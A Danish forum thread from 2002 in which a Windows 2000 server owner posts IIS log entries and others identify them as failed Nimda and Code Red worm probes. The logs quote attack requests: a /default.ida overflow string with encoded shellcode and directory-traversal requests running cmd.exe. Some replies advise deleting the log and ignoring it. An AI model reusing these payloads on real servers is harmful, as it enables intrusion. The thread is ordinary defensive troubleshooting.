Avatar billede naebet Nybegynder
06. september 2002 - 12:20 Der er 13 kommentarer og
2 løsninger

Hvad kan jeg gøre

Jeg har fundet følgende i min logfil, men min virusscan finder ikke noget. Hvad er det (nimda?) og hvad kan jeg gøre??

2002-09-06 03:04:11 61.170.198.185 - 192.168.1.3 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 401 -
Avatar billede danielks Nybegynder
06. september 2002 - 12:24 #1
Ignorer det... Slet din logfil, og kør videre som om ingenting var sket.... En fejlmelding der for folk til at panikke... Ingen skade
Avatar billede jammerlab Nybegynder
06. september 2002 - 12:24 #2
Sort besked at oprette! Du fortæller jo ikke lige hvilken log fil vi snakker om nu?
Avatar billede perhaps Nybegynder
06. september 2002 - 12:26 #3
Er det din logfil på virusscanneren du mener! Kør evt. lige en onlinescanning på http://www.housecall.antivirus.com Hvis den ikke finder noget har du intet. Husk lige at deaktivere din normale virusscanner når du kører housecall.
Avatar billede danielks Nybegynder
06. september 2002 - 12:28 #4
Han siger jo netop at hans virus scanner ikke kan finde den !!! Hvordan skulle den så være havnet i virus scannerens logfil... i så fald er den blevet slettet... Her er altså heller ikke noget at frygte...
Avatar billede naebet Nybegynder
06. september 2002 - 12:30 #5
Deter logfilen for min W2K server

Jeg har lige fundet noget mere, og tror ikke at det er en fejl!
2002-09-05 13:08:24 62.194.78.24 - 192.168.1.3 80 GET /scripts/root.exe /c+dir 401 -
2002-09-05 13:08:24 62.194.78.24 - 192.168.1.3 80 GET /MSADC/root.exe /c+dir 403 -
2002-09-05 13:08:25 62.194.78.24 - 192.168.1.3 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2002-09-05 13:08:25 62.194.78.24 - 192.168.1.3 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -
2002-09-05 13:08:27 62.194.78.24 - 192.168.1.3 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-09-05 13:08:27 62.194.78.24 - 192.168.1.3 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-09-05 13:08:28 62.194.78.24 - 192.168.1.3 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-09-05 13:08:28 62.194.78.24 - 192.168.1.3 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2002-09-05 13:08:29 62.194.78.24 - 192.168.1.3 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 401 -
2002-09-05 13:08:29 62.194.78.24 - 192.168.1.3 80 GET /scripts/winnt/system32/cmd.exe /c+dir 401 -
2002-09-05 13:08:30 62.194.78.24 - 192.168.1.3 80 GET /winnt/system32/cmd.exe /c+dir 401 -
2002-09-05 13:08:30 62.194.78.24 - 192.168.1.3 80 GET /winnt/system32/cmd.exe /c+dir 401 -
Avatar billede danielks Nybegynder
06. september 2002 - 12:32 #6
Glem det... Der er ikke noget galt... Vær ikke bekymret... hvis du alligevel er det så anskaf dig en opdateret virusscanner hvilket ikke er nødvendig i denne situation... det er dog altid godt med den nyeste opdatering
Avatar billede goulduck Nybegynder
06. september 2002 - 12:33 #7
Det er jo sikkert log filen fra IIS, ikke?

Der er nogen/noget som prøver at cracke din webserver, ved at bruge nogle sikkerhedshuller.... du skal sørge for at holde din server opdateret. OG hvis det er en IIS server, så installere IISLockDown fra Microsoft.
Avatar billede migigenigenigenigen Nybegynder
06. september 2002 - 12:36 #8
naebet>>> Ingen grund til panik... vi får de medelelser i vores log-filer, i spandevis hver eneste dag! De betyder ikke noget specielt, bare ignorer dem!


Vores servere er ihvertfald ikke død af det endnu =)
Avatar billede bufferzone Praktikant
06. september 2002 - 12:36 #9
Så vidt jeg kan se er det en virus, der søger efter en IIS eller en mailserver den kan sprede sig med. Jeg kan ikke lige huske hvad den virus hedder, men hvis du ingen web server og mailserver har i drift. behøver du ikke at være bange, den kan ikke inficere dig
Avatar billede naebet Nybegynder
06. september 2002 - 12:38 #10
Virusscaneren er opdateret

Og det er rigtigt at det er IIS loggen

Jeg ser lige om jeg kan downloade IISlockdown
Avatar billede goulduck Nybegynder
06. september 2002 - 13:04 #12
Dit antivirus program bør først reagere, når/hvis der er en af disse orme, som kommer igennem et hul og får uploadet sig selv til din server.
Avatar billede naebet Nybegynder
06. september 2002 - 13:13 #13
Vil det sige at virusen ikke er kommet igennem til serveren eller ligger den og venter på at blive aktiveret??
Avatar billede prodic Mester
06. september 2002 - 14:03 #14
Kig på hvad der står :
"GET /scripts/winnt/system32/cmd.exe /c+dir 401 -"
Se især efter tallet 401, som du nok kender fra diverse søgninger på nettet(403/404-fejl).
Hvis der ikke stod et tal efter Get etc. så havde du grund til bekymring.
Tallet angiver at der er forsøgt et angreb, men at den ikke kunne finde/havde adgang til filen som den skal bruge for at iværksætte angrebet.

Og ja - det er NIMDA der spøger endnu.
Avatar billede goulduck Nybegynder
06. september 2002 - 14:15 #15
Som prodic er inde på - så er det ikke lykkedes denne orm at komme ind i dit system. De står og banker på døren, men IIS kan ikke udføre de kommandoer som bliver "smidt imod den", så derfor sker der ikke mere.

Det som den orm prøver på er at lavet et "dir" af c:, for at se om din IIS er ordentlig opdateret.
Avatar billede Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Loading billede Opret Preview
Kategori
IT-kurser om Microsoft 365, sikkerhed, personlig vækst, udvikling, digital markedsføring, grafisk design, SAP og forretningsanalyse.

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Du kan også logge ind via nedenstående tjenester